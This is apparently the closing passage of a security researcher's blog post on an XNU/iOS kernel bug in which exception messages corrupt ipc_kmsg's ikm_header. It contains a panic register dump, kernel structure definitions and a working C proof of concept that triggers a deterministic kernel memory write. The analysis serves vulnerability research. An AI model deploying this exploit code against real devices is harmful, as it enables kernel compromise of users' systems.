          x12: 0x006ef30100e89e90 x13: 0x000000016f002fb0  x14: 0x0000000100e89eb0  x15: 0x0000000160001000
          x16: 0x0020004141414141 x17: 0x1a35ffe4cbc867d8  x18: 0x0000000000000000  x19: 0xffffffeb14a82818
          x20: 0x0000000000000150 x21: 0xffffffe4cd3aa000  x22: 0xffffffe301879600  x23: 0x0000000000000000
          x24: 0x3ca5ffe301879618 x25: 0x0000000000000000  x26: 0xffffffe4cd3aa000  x27: 0x0000000000000118
          x28: 0x0000000000000008 fp:  0xffffffeb14a827f0  lr:  0xfffffff007bd0168  sp:  0xffffffeb14a827b0
          pc:  0xfffffff007bd0174 cpsr: 0x80401204         esr: 0x96000044          far: 0x0020004141414145

Indeed, due to AUTDA, x16== 0x0020004141414141.
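A quick way to see what changed is to XOR the two observed x16 values. The sketch below uses only the two register values from the panics above; it makes no claim about how the authentication failure encodes its result, it just reports which bits differ. The function names are hypothetical.

```c
#include <stdint.h>

#define X16_PAC_OFF  0x4141414141414141ull  /* x16 with PAC simulation disabled */
#define X16_PAC_ON   0x0020004141414141ull  /* x16 with PAC simulation enabled */

/* Bits that differ between the two observed x16 values. */
uint64_t
sketch_changed_bits(void)
{
    return X16_PAC_OFF ^ X16_PAC_ON;
}

/* Index of the lowest differing bit; every bit below it is identical
 * in both panics. Returns 64 if the values are equal. */
unsigned
sketch_lowest_changed_bit(void)
{
    uint64_t diff = sketch_changed_bits();
    unsigned bit = 0;

    while (bit < 64 && ((diff >> bit) & 1) == 0) {
        bit++;
    }
    return bit;
}
```

The difference is 0x4161410000000000, so the low 40 bits of our value are untouched and only the upper bits were rewritten.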

Note that this ipc_kmsg corruption is done in a 100% deterministic way - there is no heap shaping, no race to win, etc. This part simply cannot fail.

structs

Of course, the proper way to do this is to look at the structures copied into the kmsg. You can view all the structures and their layouts in the source. For instance, let’s look at ARM_THREAD_STATE64.

Let’s start by tracking down arm_thread_state64 (defined in osfmk/mach/arm/_structs.h). First, the table that maps each state flavor to its size:

/*
 * Maps state flavor to number of words in the state:
 */
/* __private_extern__ */
unsigned int _MachineStateCount[] = {
	[ARM_UNIFIED_THREAD_STATE] = ARM_UNIFIED_THREAD_STATE_COUNT,
	[ARM_VFP_STATE] = ARM_VFP_STATE_COUNT,
	[ARM_EXCEPTION_STATE] = ARM_EXCEPTION_STATE_COUNT,
	[ARM_DEBUG_STATE] = ARM_DEBUG_STATE_COUNT,
	[ARM_THREAD_STATE64] = ARM_THREAD_STATE64_COUNT,
	[ARM_EXCEPTION_STATE64] = ARM_EXCEPTION_STATE64_COUNT,
...
};

Ok, let’s see ARM_THREAD_STATE64_COUNT:

#define ARM_THREAD_STATE64_COUNT ((mach_msg_type_number_t) \
	(sizeof (arm_thread_state64_t)/sizeof(uint32_t)))

And arm_thread_state64_t:

typedef _STRUCT_ARM_THREAD_STATE64 arm_thread_state64_t;

Finally:

#define _STRUCT_ARM_THREAD_STATE64      struct arm_thread_state64
_STRUCT_ARM_THREAD_STATE64
{
	__uint64_t    x[29];    /* General purpose registers x0-x28 */
	__uint64_t    fp;               /* Frame pointer x29 */
	__uint64_t    lr;               /* Link register x30 */
	__uint64_t    sp;               /* Stack pointer x31 */
	__uint64_t    pc;               /* Program counter */
	__uint32_t    cpsr;             /* Current program status register */
	__uint32_t    flags;    /* Flags describing structure format */
};

Exactly what we expected to see :)
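As a sanity check on the sizes involved, the sketch below re-declares the structure with the same field layout under a stand-in name (sketch_arm_thread_state64, not the real type) and applies the same formula as ARM_THREAD_STATE64_COUNT.

```c
#include <stddef.h>
#include <stdint.h>

/* Stand-in with the same field layout as the struct quoted above. */
struct sketch_arm_thread_state64 {
    uint64_t x[29];   /* x0-x28 */
    uint64_t fp;      /* x29 */
    uint64_t lr;      /* x30 */
    uint64_t sp;
    uint64_t pc;
    uint32_t cpsr;
    uint32_t flags;
};

/* Same formula as ARM_THREAD_STATE64_COUNT: size in 32-bit words. */
#define SKETCH_THREAD_STATE64_COUNT \
    ((uint32_t)(sizeof(struct sketch_arm_thread_state64) / sizeof(uint32_t)))

/* Byte offset of register x[n] inside the state (valid for n < 29). */
size_t
sketch_reg_offset(unsigned n)
{
    return offsetof(struct sketch_arm_thread_state64, x) +
           (size_t)n * sizeof(uint64_t);
}
```

The state is 272 bytes (68 words), and x14, for example, sits 0x70 bytes into it.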

POC - ikm_header corruption

The value that corrupts ikm_header is x14. Therefore, the POC for an arbitrary write (of the value size == 0x150) is as follows:

void *trigger_breakpoint(void* arg) {
    thread_set_exception_ports(mach_thread_self(),
                                    EXC_MASK_ALL,
                                    *(int *)arg,
                                    EXCEPTION_STATE,
                                    ARM_THREAD_STATE64);

    /* ikm_header is set by the value of x14*/
    uint64_t val = 0x4141414141414141;
    asm volatile ("mov x14, %0" : "+r"(val) );

    __builtin_trap();
    return arg;
}

void trigger_corruption(void) {
    pthread_t t;
    int p = mk_timer_create();

    mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND);
    pthread_create(&t, 0, trigger_breakpoint, &p);
    for(;;);
}

void poc(void) {
    printf("trigger\n");
    trigger_corruption();
}
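The choice of x14 can be cross-checked with a little arithmetic. This sketch relies on one loudly labeled assumption: that the thread state begins 0x40 bytes into the kernel-side message. That offset is not taken from the source; it was chosen because it makes preamble plus state equal the observed size of 0x150. The other inputs come from the debugger session and the disassembly, and the function names are hypothetical.

```c
#include <stdint.h>

#define SK_UNDERFLOW        0x98u  /* kmsg - memcpy destination (debugger session) */
#define SK_HEADER_FIELD_OFF 0x18u  /* ikm_header offset (LDR X16, [X22,#0x18]) */
#define SK_STATE_OFF        0x40u  /* ASSUMPTION: thread state offset in the message */
#define SK_STATE_SIZE       272u   /* 33 64-bit registers + cpsr + flags */

/* Index of the x register whose value lands on ikm_header, or -1 if none. */
int
sketch_register_over_header(void)
{
    uint32_t msg_off = SK_UNDERFLOW + SK_HEADER_FIELD_OFF; /* offset in message */
    uint32_t idx;

    if (msg_off < SK_STATE_OFF || (msg_off - SK_STATE_OFF) % 8 != 0) {
        return -1;
    }
    idx = (msg_off - SK_STATE_OFF) / 8;
    return idx < 29 ? (int)idx : -1;
}

/* Consistency check on the assumption: preamble + state should equal size. */
uint32_t
sketch_total_size(void)
{
    return SK_STATE_OFF + SK_STATE_SIZE;
}
```

Under that assumption the ikm_header field falls at message offset 0xb0, which is x[14], and the total comes out to 0x150, matching the size seen in x20.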

What’s next?

Even with a PAC bypass or another arbitrary write that does not require a PAC bypass, there is much work to do. Without the ability to read kernel memory, the arbitrary write alone won’t help us. We need to build relative/arbitrary read primitives, read some pointers, etc. However, as I’ve said at the beginning, that’s not part of this blogpost’s goals :)

I hope you enjoyed this blogpost.

Thanks,

Saar Amar